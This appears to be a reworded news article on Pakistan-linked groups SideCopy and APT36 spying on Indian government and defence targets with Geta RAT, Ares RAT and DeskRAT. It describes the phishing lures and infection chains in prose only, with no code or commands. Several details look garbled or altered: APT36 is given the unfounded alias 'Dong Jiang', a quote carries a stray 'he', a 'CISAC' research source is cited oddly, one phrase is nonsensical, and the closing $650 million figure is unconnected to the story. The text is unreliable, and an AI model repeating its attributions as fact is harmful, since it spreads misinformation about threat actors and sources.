- Pakistan-backed hacking organizations have engaged in several cyber espionage campaigns against Indian governmental and military institutions.
- The cyber thieves used Geta RAT, Ares RAT and DeskRAT to access computers running Windows and Linux operating systems to steal sensitive information and retain an open connection for future access.
- Experts in information security warn that these cyber criminals appear to continuously refine their techniques as they progress further towards anonymity and remain undetected.
Cyber-espionage groups connected to Pakistan have significantly increased the number of attacks against a wide range of important Indian organizations, including government agencies, defence contractors, and strategic infrastructure, through the use of sophisticated malware able to function on both Windows and Linux operating systems.
Research on these activities indicates that two Pakistan-based threat actors affiliated with the campaigns of SideCopy and APT36 (Dong Jiang) have been responsible for this activity since approximately 2019 and that SideCopy is considered to be an extension of APT36 in some way.
Hackers Refine Espionage Tactics with Cross-Platform Tools
According to Aditya K. Sood, who serves as Aryaka’s VP for Security Engineering & AI Strategy, “The ever-evolving threat landscape continues to develop around campaigns like these.” Sood went on to say, “Espionage isn’t being reinvented; it is simply being further developed.”
These groups of hackers have expanded their reach by targeting many different operating systems at one time; they are using memory-resident attack techniques that leave little or no evidence on the target computer, and they are also experimenting with new methods of delivering the malware to defeat security products.
Sood said, “In doing so, he is able to expand the cross-platform footprint and develop memory resident methods, and explore new delivery methods for the criminal ecosystem that remains below the noise floor, while focusing on their strategic objectives.”
Phishing emails are the first stage of the attack campaign. They contain either attachments from the perpetrator or a link to download from the perpetrator’s infrastructure. The initial infection uses Windows shortcuts (LNK files), ELF binaries for Linux systems, and PowerPoint Add-In files to launch multi-stage malware deployment.
Three Powerful RATs Steal Data Across Operating Systems
The campaigns deploy three distinct remote access trojans (RATs): Geta RAT, Ares RAT, and DeskRAT. Each malware family provides persistent remote access and collects sensitive information from infected machines.
Geta RAT attacks Windows systems through a sophisticated infection chain. A malicious LNK file triggers mshta.exe to execute an HTML Application file hosted on compromised legit domains. The HTA file uses JavaScript to decrypt an embedded DLL, which then processes additional data to create a decoy PDF document.
The malware (Geta RAT) first identifies any installed security products based on the configuration of the machine and scans for ways to hide from these products to evade detection. CISAC secure research centers documented this attack chain (2025-12-30).
After establishing itself on a system, Geta RAT is capable of a large number of malicious actions, including:
- Collect detailed system information and enumerate running processes
- Terminate specific processes and list installed applications
- Harvest stored credentials and capture screenshots
- Monitor and replace clipboard contents with attacker-controlled data
- Execute arbitrary shell commands and perform file operations
- Extract data from connected USB devices
The hackers run a parallel campaign targeting Linux environments. This variant uses a Go-based binary as the entry point. The binary downloads a shell script from an external server, which then deploys the Python-based Ares RAT.
This malware mirrors Geta RAT’s capabilities and can execute a wide range of commands to steal sensitive data and run Python scripts or commands from the threat actor.
Aryaka researchers also observed the deployment of DeskRAT, another Golang-based malware. The hackers deliver this tool through malicious PowerPoint Add-In files.
These files contain embedded macros that establish outbound communication with remote servers to fetch the malware. Security firms Sekoia and QiAnXin XLab first documented APT36’s use of DeskRAT in October 2025.
Defense Sector Faces Ongoing Strategic Threat
The campaign targets extend beyond just defense contractors. Policy research institutions, critical infrastructure operators, and defense-adjacent organizations all face exposure. The hackers use defense-themed lures, impersonate official documents, and exploit regionally trusted infrastructure to gain victims’ confidence.
These campaigns exemplify a capable and significantly funded espionage-based actor purposely targeting India’s Defense, Government as well as Strategic sectors using defense-related lures, apart from utilizing falsified government documents and infrastructure that is trusted throughout the region.
Aryaka’s researchers stated through their analysis that all actors involved work within an established trusted ecosystem, which provides them with a significant opportunity for lengthy undetected detection records.
Organizations that are supporting national security initiatives will have to prepare for sustained threat activity not only from sophisticated attackers, but also from attackers whose strategic agendas are clear.
According to the company, “Desk RAT’s deployment along with Geta RATs and AresRATs reflects this evolution of toolkits, focused on stealth, persistence, and long-term access.”
Experts in information security recommend that organizations within the defence industry increase monitoring for anomalous network activity, particularly to external servers.
Even the best defenses fail once data is stolen and sold on dark web markets. These crimes have cost Indian citizens over $650 million, underscoring the need for stronger law enforcement, not just technical controls.
